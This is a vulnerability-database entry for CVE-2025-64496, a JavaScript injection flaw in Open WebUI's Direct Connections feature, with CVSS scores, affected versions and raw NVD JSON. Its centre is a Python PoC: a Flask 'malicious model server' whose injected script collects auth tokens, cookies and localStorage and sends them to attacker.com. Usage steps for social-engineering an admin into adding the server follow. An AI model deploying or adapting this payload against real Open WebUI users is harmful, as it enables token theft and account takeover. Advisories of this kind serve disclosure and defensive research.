Security Vulnerability Report
中文
CVE-2025-64496 CVSS 7.3 HIGH

CVE-2025-64496

Published: 2025-11-08 02:15:35
Last Modified: 2025-11-26 15:36:09
Source: [email protected]

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Versions 0.6.224 and prior contain a code injection vulnerability in the Direct Connections feature that allows malicious external model servers to execute arbitrary JavaScript in victim browsers via Server-Sent Event (SSE) execute events. This leads to authentication token theft, complete account takeover, and when chained with the Functions API, enables remote code execution on the backend server. The attack requires the victim to enable Direct Connections (disabled by default) and add the attacker's malicious model URL, achievable through social engineering of the admin and subsequent users. This issue is fixed in version 0.6.35.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:* - VULNERABLE
Open WebUI < 0.6.35
Open WebUI 0.6.224及之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-64496 PoC - Malicious Model Server # This PoC demonstrates how an attacker can inject malicious JavaScript # through SSE execute events in Open WebUI's Direct Connections feature from flask import Flask, Response import time app = Flask(__name__) @app.route('/v1/chat/completions') def malicious_sse(): """ Malicious SSE endpoint that injects JavaScript for: 1. Stealing authentication tokens 2. Performing account takeover 3. Enabling RCE via Functions API (if chained) """ # Malicious JavaScript payload for token theft # This script steals the auth token and sends it to attacker server malicious_js = ''' (function() { // Steal authentication token from localStorage var token = localStorage.getItem('token') || localStorage.getItem('auth-token') || document.cookie.match(/token=([^;]+)/)?.[1]; // Send token to attacker's server if (token) { fetch('https://attacker.com/steal?token=' + encodeURIComponent(token)) .then(r => r.json()) .then(data => { console.log('Token stolen:', token); // Additional actions for account takeover }); } // Exfiltrate user data var userData = { cookies: document.cookie, localStorage: Object.keys(localStorage).reduce((obj, key) => { obj[key] = localStorage.getItem(key); return obj; }, {}) }; fetch('https://attacker.com/exfil', { method: 'POST', body: JSON.stringify(userData), headers: {'Content-Type': 'application/json'} }); })(); ''' # Escape JavaScript for SSE injection escaped_js = malicious_js.replace('\n', '\\n').replace('"', '\\"') def generate(): # Send SSE event with injected JavaScript yield f"data: {escaped_js}\n\n" # Send legitimate-looking response yield f"data: {{\"id\":\"chatcmpl-malicious\",\"object\":\"chat.completion.chunk\",\"created\":{int(time.time())},\"model\":\"malicious-model\",\"choices\":[{{\"index\":0,\"delta\":{{\"content\":\"This is a legitimate response\"}},\"finish_reason\":\"stop\"}}]}}\n\n" yield "data: [DONE]\n\n" return Response(generate(), mimetype='text/event-stream') if __name__ == '__main__': # Run on port 8080 app.run(host='0.0.0.0', port=8080, debug=True) # Usage: # 1. Deploy this malicious server # 2. Social engineer admin to add malicious model URL in Direct Connections # 3. When any user connects, the JavaScript will execute and steal tokens # 4. Attacker uses stolen token to take over accounts

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64496", "sourceIdentifier": "[email protected]", "published": "2025-11-08T02:15:35.443", "lastModified": "2025-11-26T15:36:09.183", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Versions 0.6.224 and prior contain a code injection vulnerability in the Direct Connections feature that allows malicious external model servers to execute arbitrary JavaScript in victim browsers via Server-Sent Event (SSE) execute events. This leads to authentication token theft, complete account takeover, and when chained with the Functions API, enables remote code execution on the backend server. The attack requires the victim to enable Direct Connections (disabled by default) and add the attacker's malicious model URL, achievable through social engineering of the admin and subsequent users. This issue is fixed in version 0.6.35."}, {"lang": "es", "value": "Open WebUI es una plataforma de inteligencia artificial autoalojada diseñada para operar completamente sin conexión. Las versiones 0.6.224 y anteriores contienen una vulnerabilidad de inyección de código en la función de Conexiones Directas que permite a servidores de modelos externos maliciosos ejecutar JavaScript arbitrario en los navegadores de las víctimas a través de eventos de ejecución de Server-Sent Event (SSE). Esto conduce al robo de tokens de autenticación, a la toma de control completa de la cuenta y, cuando se encadena con la API de Funciones, permite la ejecución remota de código en el servidor backend. El ataque requiere que la víctima habilite las Conexiones Directas (deshabilitadas por defecto) y añada la URL del modelo malicioso del atacante, lo cual se puede lograr mediante ingeniería social del administrador y usuarios posteriores. Este problema está solucionado en la versión 0.6.35."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-95"}, {"lang": "en", "value": "CWE-501"}, {"lang": "en", "value": "CWE-829"}, {"lang": "en", "value": "CWE-830"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.6.35", "matchCriteriaId": "E8274E63-8712-4A92-9161-E5D5EC241CD4"}]}]}], "references": [{"url": "https://github.com/open-webui/open-webui/commit/8af6a4cf21b756a66cd58378a01c60f74c39b7ca", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-cm35-v4vp-5xvx", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-cm35-v4vp-5xvx", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.